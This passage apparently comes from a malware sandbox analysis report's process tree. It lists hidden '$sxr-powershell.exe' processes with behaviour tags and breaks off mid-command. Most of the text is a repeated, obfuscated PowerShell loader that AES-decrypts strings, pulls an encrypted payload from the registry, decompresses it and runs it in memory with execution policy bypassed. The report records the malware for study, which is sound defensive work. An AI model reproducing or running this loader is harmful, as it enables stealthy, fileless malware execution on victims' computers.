'')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        
        PID:1968
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:6068
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        
        PID:3744
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        Executes dropped EXE
        
        PID:5908
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join 